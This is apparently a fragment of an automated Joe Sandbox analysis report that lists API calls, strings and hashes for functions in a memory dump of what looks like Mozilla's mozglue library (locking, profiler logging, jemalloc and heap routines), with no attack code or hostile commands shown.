                                                                  • Instruction ID: b06e86a22d0b04bda586d7ec08140b9cc6f62e6c3cc160cfacd2e80329464ba8
                                                                  • Opcode Fuzzy Hash: 362936922295768741ef693aa068b901b99407dbe7cf74ab175365ed95738b71
                                                                  • Instruction Fuzzy Hash: 9E5168757046148FCB24DF59C694A3ABBF5FF89318B6A899DE98A87741C731F801CB80
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C911D0F
                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,6C911BE3,?,?,6C911D96,00000000), ref: 6C911D18
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,6C911BE3,?,?,6C911D96,00000000), ref: 6C911D4C
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C911DB7
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C911DC0
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C911DDA
                                                                    • Part of subcall function 6C911EF0: GetCurrentThreadId.KERNEL32 ref: 6C911F03
                                                                    • Part of subcall function 6C911EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C911DF2,00000000,00000000), ref: 6C911F0C
                                                                    • Part of subcall function 6C911EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C911F20
                                                                  • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C911DF4
                                                                    • Part of subcall function 6C8DCA10: malloc.MOZGLUE(?), ref: 6C8DCA26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 1880959753-0
                                                                  • Opcode ID: 49d497eba7cc2f8cacf7579347f270822492b31030fec5c63a0e9d8a8118cec8
                                                                  • Instruction ID: 8ac9c13daa3551d05cd607a9a07b7f36152bd796d9aea6fab3dd0a8ecb448b5b
                                                                  • Opcode Fuzzy Hash: 49d497eba7cc2f8cacf7579347f270822492b31030fec5c63a0e9d8a8118cec8
                                                                  • Instruction Fuzzy Hash: DF418CB5204704AFCB10DF29C489A5ABBF9FF99318F20846DE95A87B41CB71F814CB91
                                                                  APIs
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94E220,?,?,?,?,6C8D3899,?), ref: 6C8D38B2
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94E220,?,?,?,6C8D3899,?), ref: 6C8D38C3
                                                                  • free.MOZGLUE(00000000,?,?,?,6C8D3899,?), ref: 6C8D38F1
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C8D3920
                                                                  • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C8D3899,?), ref: 6C8D392F
                                                                  • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C8D3899,?), ref: 6C8D3943
                                                                  • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C8D396E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                  • String ID:
                                                                  • API String ID: 3047341122-0
                                                                  • Opcode ID: 88bc2596a224fc4adefd23fc560b969ce14b199639527495ccaf492618a6b564
                                                                  • Instruction ID: ec1e6edc6d70385c8ed14aa9f023015687bfa2ef9fc6a4cda671561598e42d7b
                                                                  • Opcode Fuzzy Hash: 88bc2596a224fc4adefd23fc560b969ce14b199639527495ccaf492618a6b564
                                                                  • Instruction Fuzzy Hash: FB210576600B20EFD720DF25C980B96B7B5EF55328F268829D95A97B10C730FC85CB91
                                                                  APIs
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9084F3
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C90850A
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C90851E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C90855B
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C90856F
                                                                  • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9085AC
                                                                    • Part of subcall function 6C907670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C90767F
                                                                    • Part of subcall function 6C907670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C907693
                                                                    • Part of subcall function 6C907670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C9085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9076A7
                                                                  • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9085B2
                                                                    • Part of subcall function 6C8E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8E5EDB
                                                                    • Part of subcall function 6C8E5E90: memset.VCRUNTIME140(6C927765,000000E5,55CCCCCC), ref: 6C8E5F27
                                                                    • Part of subcall function 6C8E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8E5FB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                  • String ID:
                                                                  • API String ID: 2666944752-0
                                                                  • Opcode ID: e7282293e907126c2009eeac36e6ba0a90aca2da7a6ee6f247c761dc718e1259
                                                                  • Instruction ID: 5a789a8f41148f5c4253fde787ad55ea92b5abe1c9b2e883183e884ebd577629
                                                                  • Opcode Fuzzy Hash: e7282293e907126c2009eeac36e6ba0a90aca2da7a6ee6f247c761dc718e1259
                                                                  • Instruction Fuzzy Hash: 74218E743006019FDB28DB28C888A6AB7B9AF9530DF24492DE55BC3B41EB31F958CB55
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C8D1699
                                                                  • VerSetConditionMask.NTDLL ref: 6C8D16CB
                                                                  • VerSetConditionMask.NTDLL ref: 6C8D16D7
                                                                  • VerSetConditionMask.NTDLL ref: 6C8D16DE
                                                                  • VerSetConditionMask.NTDLL ref: 6C8D16E5
                                                                  • VerSetConditionMask.NTDLL ref: 6C8D16EC
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C8D16F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                  • String ID:
                                                                  • API String ID: 375572348-0
                                                                  • Opcode ID: 34f687cfa25940243c8c41c22f9fda6ca28a9b43a203f695c71191af132d24bd
                                                                  • Instruction ID: bfc4d45957c5baf3896d19fcb58a21e8c9d8aee8aa5d388efb37adc606293c4d
                                                                  • Opcode Fuzzy Hash: 34f687cfa25940243c8c41c22f9fda6ca28a9b43a203f695c71191af132d24bd
                                                                  • Instruction Fuzzy Hash: 9121D5B07442086FEB206A649D85FBBB37CDF86718F418528F6059B5C1C774ED54C7A1
                                                                  APIs
                                                                    • Part of subcall function 6C8FCBE8: GetCurrentProcess.KERNEL32(?,6C8C31A7), ref: 6C8FCBF1
                                                                    • Part of subcall function 6C8FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8C31A7), ref: 6C8FCBFA
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C8D4A68), ref: 6C90945E
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C909470
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C909482
                                                                    • Part of subcall function 6C909420: __Init_thread_footer.LIBCMT ref: 6C90949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90F619
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C90F598), ref: 6C90F621
                                                                    • Part of subcall function 6C9094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9094EE
                                                                    • Part of subcall function 6C9094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C909508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90F637
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8,?,?,00000000,?,6C90F598), ref: 6C90F645
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8,?,?,00000000,?,6C90F598), ref: 6C90F663
                                                                  Strings
                                                                  • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C90F62A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                  • API String ID: 1579816589-753366533
                                                                  • Opcode ID: 8208b81ed1bedf9d46454b16262c0beb4b447feb5c9eff54c496f4fc9b40f4dc
                                                                  • Instruction ID: de9448d86a3f85ee7e4afd444f6d5e1889fa6a20bd2c4b4d952cc7772d906d97
                                                                  • Opcode Fuzzy Hash: 8208b81ed1bedf9d46454b16262c0beb4b447feb5c9eff54c496f4fc9b40f4dc
                                                                  • Instruction Fuzzy Hash: E811E375309605AFCB04BF29D848DAA777DFB8636CF604059EA0583F01CB31E825CBA4
                                                                  APIs
                                                                    • Part of subcall function 6C8FAB89: EnterCriticalSection.KERNEL32(6C94E370,?,?,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284), ref: 6C8FAB94
                                                                    • Part of subcall function 6C8FAB89: LeaveCriticalSection.KERNEL32(6C94E370,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8FABD1
                                                                  • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C8D1FDE
                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C8D1FFD
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D2011
                                                                  • FreeLibrary.KERNEL32 ref: 6C8D2059
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                  • String ID: CoCreateInstance$combase.dll
                                                                  • API String ID: 4190559335-2197658831
                                                                  • Opcode ID: 71c7ab6a6a181010d4266d74a6ce560533bd4c38dc525a4923b68e55cb0d4695
                                                                  • Instruction ID: 2a90b3adbd36a880d8fa68891cd04cd1a31590f425c6016bb4f802baaf640595
                                                                  • Opcode Fuzzy Hash: 71c7ab6a6a181010d4266d74a6ce560533bd4c38dc525a4923b68e55cb0d4695
                                                                  • Instruction Fuzzy Hash: 87116A7520C206AFEF30EF15C948EAB3B79EB8636DF20C429E91482640D731EC11CBA0
                                                                  APIs
                                                                    • Part of subcall function 6C8FAB89: EnterCriticalSection.KERNEL32(6C94E370,?,?,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284), ref: 6C8FAB94
                                                                    • Part of subcall function 6C8FAB89: LeaveCriticalSection.KERNEL32(6C94E370,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8FABD1
                                                                  • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C8FD9F0,00000000), ref: 6C8D0F1D
                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C8D0F3C
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D0F50
                                                                  • FreeLibrary.KERNEL32(?,6C8FD9F0,00000000), ref: 6C8D0F86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                  • String ID: CoInitializeEx$combase.dll
                                                                  • API String ID: 4190559335-2063391169
                                                                  • Opcode ID: afe6869fadbbe2b2e10bcb035cd7ede3b6684c1674a4ab822137f2b3e6b21897
                                                                  • Instruction ID: 0b843023cd75ac9c41259e6053ca33133c5a9f0accd78e226320723cfe2daaca
                                                                  • Opcode Fuzzy Hash: afe6869fadbbe2b2e10bcb035cd7ede3b6684c1674a4ab822137f2b3e6b21897
                                                                  • Instruction Fuzzy Hash: 9111C6743092429BDF10EF58CA08E6B3774EB8A32EF32CA29E90592781D730E401CF52
                                                                  APIs
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C8D4A68), ref: 6C90945E
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C909470
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C909482
                                                                    • Part of subcall function 6C909420: __Init_thread_footer.LIBCMT ref: 6C90949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90F559
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C90F561
                                                                    • Part of subcall function 6C9094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9094EE
                                                                    • Part of subcall function 6C9094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C909508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90F577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90F585
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90F5A3
                                                                  Strings
                                                                  • [I %d/%d] profiler_pause_sampling, xrefs: 6C90F3A8
                                                                  • [I %d/%d] profiler_resume, xrefs: 6C90F239
                                                                  • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C90F56A
                                                                  • [I %d/%d] profiler_resume_sampling, xrefs: 6C90F499
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                  • API String ID: 2848912005-2840072211
                                                                  • Opcode ID: 04a5e1d45f87841475fdc2720097504ff396c128dd2b6341833398e003bfb84d
                                                                  • Instruction ID: aa68707c619889bd6b567472773c6258fdbbaef3df53672b66bb2215001d835c
                                                                  • Opcode Fuzzy Hash: 04a5e1d45f87841475fdc2720097504ff396c128dd2b6341833398e003bfb84d
                                                                  • Instruction Fuzzy Hash: 25F054757046049FDB007B65984CE6E777DEBD626DF208055EA0983701DF75C80587A5
                                                                  APIs
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C8D4A68), ref: 6C90945E
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C909470
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C909482
                                                                    • Part of subcall function 6C909420: __Init_thread_footer.LIBCMT ref: 6C90949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90F619
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C90F598), ref: 6C90F621
                                                                    • Part of subcall function 6C9094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9094EE
                                                                    • Part of subcall function 6C9094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C909508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90F637
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8,?,?,00000000,?,6C90F598), ref: 6C90F645
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8,?,?,00000000,?,6C90F598), ref: 6C90F663
                                                                  Strings
                                                                  • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C90F62A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                  • API String ID: 2848912005-753366533
                                                                  • Opcode ID: 994dbaa227aa35efb3399a42a3dbd0f7d74fbe7be6196af7f538296403adbf0d
                                                                  • Instruction ID: 8c0c079df108662ed9b1ea896846cf3c6273261d1fb72eca775f20c781bd278d
                                                                  • Opcode Fuzzy Hash: 994dbaa227aa35efb3399a42a3dbd0f7d74fbe7be6196af7f538296403adbf0d
                                                                  • Instruction Fuzzy Hash: C6F05EB5308604AFDB007B65984CE5E7B7DEBD62ADF208069EA0983B41DB75880587A5
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(kernel32.dll,6C8D0DF8), ref: 6C8D0E82
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C8D0EA1
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D0EB5
                                                                  • FreeLibrary.KERNEL32 ref: 6C8D0EC5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                  • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                  • API String ID: 391052410-1680159014
                                                                  • Opcode ID: 50bf3c7ecbd46bb6c7ee697d1be542c545e4e914d254aee5bc0d1394e3352b4d
                                                                  • Instruction ID: a9ac95e6ea30155ff262facb878555b29f5ad01f3afb39d37ac53ec6c4712a47
                                                                  • Opcode Fuzzy Hash: 50bf3c7ecbd46bb6c7ee697d1be542c545e4e914d254aee5bc0d1394e3352b4d
                                                                  • Instruction Fuzzy Hash: C7014674B087839BEF24AFE8CA14A4A73B6E786B1DF21AD25D91182F40D738B4058B51
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C8FCFAE,?,?,?,6C8C31A7), ref: 6C9005FB
                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C8FCFAE,?,?,?,6C8C31A7), ref: 6C900616
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C8C31A7), ref: 6C90061C
                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C8C31A7), ref: 6C900627
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: _writestrlen
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                  • API String ID: 2723441310-2186867486
                                                                  • Opcode ID: 0071169a5ee95484fb23118d9152b395162ef07a3ae13436a1bce126cd7bfacf
                                                                  • Instruction ID: c4c101d3835d033e5846ab0604c72a27d03fd1e955a23170d399f5ee622a1e02
                                                                  • Opcode Fuzzy Hash: 0071169a5ee95484fb23118d9152b395162ef07a3ae13436a1bce126cd7bfacf
                                                                  • Instruction Fuzzy Hash: 93E08CE2A0242037F6143256AC86DBB761CDBD6138F080139FD0D86701EA4AED1A51F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c926751b4c3fb4212c8b460ce1cf5d445c72370335916fa2d74bbd7293bcce7
                                                                  • Instruction ID: 8ac1a565d4a59842dc0364b0a1f6215a6f8d8beac8f227bf0c0e5a6c2662b289
                                                                  • Opcode Fuzzy Hash: 6c926751b4c3fb4212c8b460ce1cf5d445c72370335916fa2d74bbd7293bcce7
